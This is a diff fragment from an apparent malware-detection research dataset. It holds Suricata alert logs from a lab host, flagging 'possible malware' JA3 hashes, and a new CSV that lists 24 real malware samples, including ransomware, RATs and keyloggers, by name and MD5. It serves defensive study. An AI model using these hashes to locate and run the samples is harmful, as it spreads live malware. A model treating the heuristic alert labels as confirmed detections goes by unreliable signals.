[Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49910 -> 40.112.91.29:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:17:21.957","04/04/2020-14:17:16.058461 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49911 -> 52.164.221.179:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:16:36.953","04/04/2020-14:16:28.699113 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49902 -> 204.79.197.200:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:16:36.953","04/04/2020-14:16:28.856094 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49903 -> 40.112.91.29:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:16:36.953","04/04/2020-14:16:29.144607 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49904 -> 52.164.221.179:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.944","04/04/2020-14:15:01.097202 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.026702 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49862 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.185738 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.202452 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49863 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.363285 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.384791 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49864 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.540522 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.575767 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49865 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.737943 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.765554 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49866 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.922604 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:15:01.943","04/04/2020-14:15:00.941666 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49867 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:54.925","04/04/2020-14:14:54.094948 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.017360 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.045360 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49852 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.199636 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.216698 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49853 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.372765 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.398940 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49854 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.551477 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.633212 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49855 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.806811 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:53.924","04/04/2020-14:14:53.907213 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49856 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:50.773445 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:50.834734 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49838 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:50.995946 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.010990 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49839 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.165571 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.194822 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49840 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.345398 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.358540 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49841 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.511312 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.528123 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49842 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.683343 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.697101 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49843 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.851360 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:51.909558 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49845 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.082298 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.096916 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49847 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.249210 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.286215 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49848 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.440222 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.461215 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49849 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.632359 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.686152 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49850 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.844840 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.923","04/04/2020-14:14:52.863110 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49851 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:48.752968 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:48.782958 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49827 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:48.940263 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:48.978203 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49829 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.160686 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.175383 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49830 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.327000 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.421079 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49831 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.595383 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.625799 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49833 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.796775 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:49.901595 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49834 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.122723 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.200167 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49835 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.380725 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.414522 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49836 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.589496 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.922","04/04/2020-14:14:50.606530 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49837 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.921","04/04/2020-14:14:48.409470 [**] [1:2027390:3] ET USER_AGENTS Microsoft Device Metadata Retrieval Client User-Agent [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49825 -> 23.216.248.201:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:14:52.921","04/04/2020-14:14:48.752968 [**] [1:2025275:3] ET INFO Windows OS Submitting USB Metadata to Microsoft [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:49826 -> 13.88.139.208:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:08:28.719","04/04/2020-14:08:27.374959 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49716 -> 52.114.88.29:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:04:33.699","04/04/2020-14:04:25.967688 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49693 -> 51.124.78.146:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:38.689","04/04/2020-14:03:36.114517 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49690 -> 51.124.78.146:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:38.689","04/04/2020-14:03:36.318741 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49692 -> 13.107.5.88:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:17.919941 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49684 -> 52.142.114.176:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:18.030776 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49685 -> 23.208.77.57:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:20.045879 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49686 -> 40.90.23.206:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:20.046931 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49687 -> 40.90.23.206:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:22.989184 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49688 -> 192.229.221.185:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:23.683","04/04/2020-14:03:22.989188 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49689 -> 192.229.221.185:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:08.678","04/04/2020-14:03:08.238246 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49678 -> 13.107.136.254:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:08.678","04/04/2020-14:03:08.521793 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49679 -> 13.107.246.10:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:02.690998 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49673 -> 104.98.129.233:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:06.117423 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49675 -> 204.79.197.200:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:06.119289 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49674 -> 204.79.197.200:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:07.437860 [**] [1:2028371:2] ET JA3 Hash - Possible Malware - Fake Firefox Font Update [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49676 -> 52.114.88.29:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:03:07.677","04/04/2020-14:03:07.620161 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49677 -> 204.79.197.200:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:02:22.671","04/04/2020-14:02:20.328402 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49853 -> 65.52.7.224:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:02:22.671","04/04/2020-14:02:20.666217 [**] [1:2028362:2] ET JA3 Hash - Possible Malware - Banking Phish [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:49854 -> 204.79.197.200:443","/var/log/suricata/fast.log" diff --git a/data/short_overview.csv b/data/short_overview.csv new file mode 100644 index 0000000..7d15b63 --- /dev/null +++ b/data/short_overview.csv @@ -0,0 +1,39 @@ +ID,Category,Sample_Name,Sample_Type,Sample_MD5 +1,Cryptominer,Generic.Application.CoinMiner,"Win32 EXE +",c22908fe460312d76b50129aa3ef2cf2 +2,Backdoor,Win32:Malware-gen,"Win32 EXE +",e6a132e279806cc95684dc2bd67a0da0 +3,Backdoor,Trojan-Banker.Agent,"Win32 EXE +",aa52c9a86073b75748ec6c98eca17dab +4,Backdoor,Trojan.DCRAT,Win32 EXE,1e2611836860d60a2a6b4c560ef74650 +5,Backdoor,Trojan.Qbot,VBS,1c347009d6fce779bca8385395f26f94 +6,Backdoor,Trojan.Agent.Zenpak,"Win32 EXE +",fbe6d341c1b69975be74616d01c6d273 +7,Backdoor,Shadowhammer,application/x-rar,c09e41b3eb42eb79853de5bd1f5a5830 +8,Backdoor,Backdoor.AsyncRAT,"Win32 EXE +",9f16a651f918972eee7be4f19d40bb91 +9,Backdoor,"Backdoor.Bladabindi +",Win32 EXE,c2c057d9645af7f64e9d11672840828e +10,Spyware,TrojanSpy.Win32,Win32 EXE,19b11aa448409adc15c93e1fdd3c6774 +11,Spyware,Trojan.Spyware,Win32 EXE,40c0304b144736668ca2a0217d296c37 +12,Spyware,HTML.SpyAgent,html,3b926d275ef56bb063d1e37042f211a3 +13,Spyware,Keylogger.HawkEye,Win32 EXE,8d897a409a231c4bdb21ac3bcf9118b1 +14,Spyware,Spyware.PasswordStealer,Win32 EXE,69ad26a3aae3e2950e5a93ccc0cd1859 +15,Spyware,Trojan.GenKryptik,Win32 EXE,9530e5c9e8591d5025e11a20f604520b +16,Ransomware,Ransom.Cryakl,Win32 EXE,23a8bfb5bdbff2f294506019cf2f425f +17,Ransomware,Ramsom.Balaclav,Win32 EXE,7ed4882c2a0d24c401cbce7536ddf792 +18,Ransomware,Ransom.Ryuk,Win32 EXE,3f5da05d62a70eb1212db39d5d6cf45e +19,Ransomware,Trojan.DOCX,DOCX,1a26c9b6ba40e4e3c3dce12de266ae10 +20,Spyware,Trojan.Lucifer,Win32 EXE,66a3124fe4ed45fae20e2bd4ee33c626 +21,Adware,Adware.Linkvertise,Win32 EXE,25fcd5a2cc5590630ab8d971e82b70cb +22,Rootkit,Rootkit.Bandios,Win32 EXE,4b042bfd9c11ab6a3fb78fa5c34f55d0 +23,Ransomware,Ransom.GandCrab,Win32 EXE,d543a6c58e8e92d0b2f33abb270a4c3d +24,Cryptominer,Miner.XMRig,Win32 EXE,5616a3471565d34d779b5b3d0520bb70 